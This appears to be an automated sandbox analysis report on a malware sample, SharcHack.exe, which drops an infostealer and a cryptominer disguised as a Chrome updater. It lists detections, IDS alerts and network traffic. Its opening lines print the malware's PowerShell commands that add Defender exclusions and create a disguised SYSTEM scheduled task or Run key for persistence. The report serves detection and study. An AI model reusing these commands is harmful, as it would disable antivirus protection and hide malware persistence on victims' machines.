                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 6176, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 6176, ProcessName: powershell.exe
                                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe, ProcessId: 3252, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 6176, ProcessName: powershell.exe
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-12-28T22:21:00.024648+010020362892Crypto Currency Mining Activity Detected192.168.2.5588671.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-12-28T22:20:09.749368+010020283713Unknown Traffic192.168.2.54970665.9.108.148443TCP
                                  2024-12-28T22:20:11.410883+010020283713Unknown Traffic192.168.2.54970865.9.108.148443TCP
                                  2024-12-28T22:20:13.426126+010020283713Unknown Traffic192.168.2.54971013.226.4.166443TCP
                                  2024-12-28T22:20:16.405067+010020283713Unknown Traffic192.168.2.54971265.9.108.148443TCP
                                  2024-12-28T22:20:19.772976+010020283713Unknown Traffic192.168.2.54971665.9.108.148443TCP
                                  2024-12-28T22:20:22.562655+010020283713Unknown Traffic192.168.2.54972013.226.4.166443TCP
                                  2024-12-28T22:20:26.326871+010020283713Unknown Traffic192.168.2.54972665.9.108.148443TCP
                                  2024-12-28T22:20:28.816418+010020283713Unknown Traffic192.168.2.54973713.226.4.166443TCP
                                  2024-12-28T22:20:32.211814+010020283713Unknown Traffic192.168.2.54974365.9.108.148443TCP
                                  2024-12-28T22:20:34.892716+010020283713Unknown Traffic192.168.2.54974913.226.4.166443TCP
                                  2024-12-28T22:20:38.184365+010020283713Unknown Traffic192.168.2.54975965.9.108.148443TCP
                                  2024-12-28T22:20:40.986490+010020283713Unknown Traffic192.168.2.54976613.226.4.166443TCP
                                  2024-12-28T22:20:44.041813+010020283713Unknown Traffic192.168.2.54977265.9.108.148443TCP
                                  2024-12-28T22:20:46.781988+010020283713Unknown Traffic192.168.2.54977813.226.4.166443TCP
                                  2024-12-28T22:20:49.809690+010020283713Unknown Traffic192.168.2.54978465.9.108.148443TCP
                                  2024-12-28T22:20:52.463831+010020283713Unknown Traffic192.168.2.54979365.9.108.148443TCP
                                  2024-12-28T22:21:14.267209+010020283713Unknown Traffic192.168.2.54983865.9.108.93443TCP
                                  2024-12-28T22:21:18.184701+010020283713Unknown Traffic192.168.2.54984965.9.108.93443TCP
                                  2024-12-28T22:21:31.158290+010020283713Unknown Traffic192.168.2.54987318.66.161.123443TCP
                                  2024-12-28T22:21:36.603537+010020283713Unknown Traffic192.168.2.54988765.9.108.93443TCP
                                  2024-12-28T22:21:38.521343+010020283713Unknown Traffic192.168.2.54989154.186.212.229443TCP
                                  2024-12-28T22:21:39.438945+010020283713Unknown Traffic192.168.2.5498963.165.135.3443TCP
                                  2024-12-28T22:21:41.545301+010020283713Unknown Traffic192.168.2.54990054.186.212.229443TCP
                                  2024-12-28T22:21:42.672007+010020283713Unknown Traffic192.168.2.54990365.9.108.93443TCP
                                  2024-12-28T22:21:44.379806+010020283713Unknown Traffic192.168.2.5499102.16.168.105443TCP
                                  2024-12-28T22:21:45.353520+010020283713Unknown Traffic192.168.2.5499113.165.135.3443TCP
                                  2024-12-28T22:21:46.849187+010020283713Unknown Traffic192.168.2.5499132.16.168.105443TCP
                                  2024-12-28T22:21:47.479091+010020283713Unknown Traffic192.168.2.54991965.9.108.93443TCP
                                  2024-12-28T22:21:49.461500+010020283713Unknown Traffic192.168.2.5499213.165.135.3443TCP
                                  2024-12-28T22:21:50.311731+010020283713Unknown Traffic192.168.2.54992254.186.212.229443TCP
                                  2024-12-28T22:21:52.482130+010020283713Unknown Traffic192.168.2.5499292.16.168.105443TCP
                                  2024-12-28T22:21:54.648806+010020283713Unknown Traffic192.168.2.5499362.16.168.105443TCP
                                  2024-12-28T22:21:57.367844+010020283713Unknown Traffic192.168.2.5499422.16.168.105443TCP
                                  2024-12-28T22:21:58.545128+010020283713Unknown Traffic192.168.2.54994365.9.108.93443TCP
                                  2024-12-28T22:22:00.529844+010020283713Unknown Traffic192.168.2.5499492.16.168.115443TCP
                                  2024-12-28T22:22:01.134398+010020283713Unknown Traffic192.168.2.5499513.165.135.3443TCP
                                  2024-12-28T22:22:03.811939+010020283713Unknown Traffic192.168.2.5499572.16.168.115443TCP
                                  2024-12-28T22:22:05.973078+010020283713Unknown Traffic192.168.2.5499642.16.168.115443TCP
                                  2024-12-28T22:22:08.446424+010020283713Unknown Traffic192.168.2.54997154.186.212.229443TCP
                                  2024-12-28T22:22:10.667366+010020283713Unknown Traffic192.168.2.5499812.16.168.115443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-12-28T22:22:25.620185+010028032742Potentially Bad Traffic192.168.2.550016104.20.94.94443TCP

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: SharcHack.exeAvira: detected
                                  Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: HEUR/AGEN.1329655
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeAvira: detection malicious, Label: HEUR/AGEN.1339346
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeAvira: detection malicious, Label: PUA/OfferCore.Gen
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeAvira: detection malicious, Label: HEUR/AGEN.1329655
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeReversingLabs: Detection: 43%
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeReversingLabs: Detection: 100%
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeReversingLabs: Detection: 83%
                                  Source: C:\Windows\Temp\cfoutowi.tmpReversingLabs: Detection: 62%
                                  Source: SharcHack.exeVirustotal: Detection: 77%Perma Link
                                  Source: SharcHack.exeReversingLabs: Detection: 81%
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                                  Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeJoe Sandbox ML: detected
                                  Source: SharcHack.exeJoe Sandbox ML: detected

                                  Location Tracking

                                  barindex
                                  Source: unknownDNS query: name: freegeoip.app
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BC01A40 CryptReleaseContext,SIaa0f8e0c251cfd1d,7_2_6BC01A40
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCC69D0 SIffb8076c269e2a85,SI8b0d9e6837e61abc,SIffb8076c269e2a85,SI8b0d9e6837e61abc,CryptCreateHash,GetLastError,SIdb45e174afb28e2c,SI905dcc543d48caab,CryptHashData,GetLastError,SIdb45e174afb28e2c,SI905dcc543d48caab,CryptDeriveKey,GetLastError,SI9a326fe0ddbebf12,SI1bf8975e567ea97a,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,SIaa0f8e0c251cfd1d,SIaa0f8e0c251cfd1d,CryptDestroyKey,CryptDestroyHash,7_2_6BCC69D0
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BCCF920 sqlite3_cryptoapi_init,CryptReleaseContext,SIaa0f8e0c251cfd1d,CryptAcquireContextW,GetLastError,SIdb45e174afb28e2c,7_2_6BCCF920

                                  Bitcoin Miner

                                  barindex
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: 34.2.updater.exe.7ff619210920.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 34.2.updater.exe.7ff619070000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 34.2.updater.exe.7ff619090700.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 34.2.updater.exe.7ff619210920.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000022.00000002.2634403580.00007FF619210000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Windows\Temp\cfoutowi.tmp, type: DROPPED
                                  Source: SharcHack.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                  Source: C:\Windows\System32\conhost.exeDirectory created: C:\Program Files\Google\Libs
                                  Source: C:\Windows\System32\cmd.exeDirectory created: C:\Program Files\Google\Libs\g.log
                                  Source: unknownHTTPS traffic detected: 172.67.160.84:443 -> 192.168.2.5:49704 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49705 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49706 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49710 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49712 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49716 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49720 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49726 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49737 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49743 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49749 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49759 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49766 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49772 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49778 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49784 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49793 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49838 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49849 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 18.66.161.123:443 -> 192.168.2.5:49873 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49887 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49896 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49903 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49911 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 18.66.161.123:443 -> 192.168.2.5:49920 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49921 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49943 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49951 version: TLS 1.2
                                  Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: v2.exe, v2.exe, 00000007.00000002.2187180994.0000000005992000.00000002.00000001.01000000.0000000C.sdmp, System.Data.SQLite.dll.5.dr
                                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: v2.exe, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: :.pdbSH source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Github\zbShield-Utils-CPP\zbShieldUtils\bin\Release\zbShieldUtils.pdb source: CheatEngine75.tmp, 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.Linq.2010\Release\System.Data.SQLite.Linq.pdb source: VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.dr
                                  Source: Binary string: .pdbSHA2562$ source: VegaStealer_v2.exe, 00000005.00000003.2037815646.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: .pdb` source: VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2192854824.0000000007CA2000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.pdb source: v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.EF6.2010\Release\System.Data.SQLite.EF6.pdb source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: Crypto.pdb source: VegaStealer_v2.exe, 00000005.00000003.2029473867.0000000003326000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: rop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: /_/artifacts/obj/EntityFramework.SqlServer/Release/net40/EntityFramework.SqlServer.pdb source: VegaStealer_v2.exe, 00000005.00000003.2037290562.000000000307C000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2010\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp
                                  Source: Binary string: /_/artifacts/obj/EntityFramework/Release/net40/EntityFramework.pdb source: VegaStealer_v2.exe, 00000005.00000003.2034886506.0000000003585000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: /_/artifacts/obj/EntityFramework.SqlServer/Release/net40/EntityFramework.SqlServer.pdbSHA256$ source: VegaStealer_v2.exe, 00000005.00000003.2037290562.000000000307C000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: pto.pdb source: VegaStealer_v2.exe, 00000005.00000003.2029473867.0000000003326000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: .pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: BouncyCastle.Crypto.pdb source: v2.exe, v2.exe, 00000007.00000002.2192854824.0000000007CA2000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: /_/artifacts/obj/EntityFramework/Release/net40/EntityFramework.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2034886506.0000000003585000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2010\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: :.pdb source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4E0F67 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,8_2_6B4E0F67
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppData\Local\Temp\is-3E079.tmpJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\userJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extractJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 4x nop then push rbx2_2_00007FF69AF15A66
                                  Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /ReasonLabs-Setup-Wizard.exe?dui=9e146be9-c76a-4720-bcdb-53011b87bd06&dit=20241228162010&is_silent=true&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100&b=&se=true&oip=26&ptl=7&dta=true&pds=%5bepp%2cvpn%2cdns%5d HTTP/1.1Host: shield.reasonsecurity.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/?fields=61439 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/?fields=61439 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                  Source: Joe Sandbox ViewIP Address: 104.21.85.189 104.21.85.189
                                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                  Source: unknownDNS query: name: ip-api.com
                                  Source: unknownDNS query: name: ip-api.com
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 65.9.108.148:443
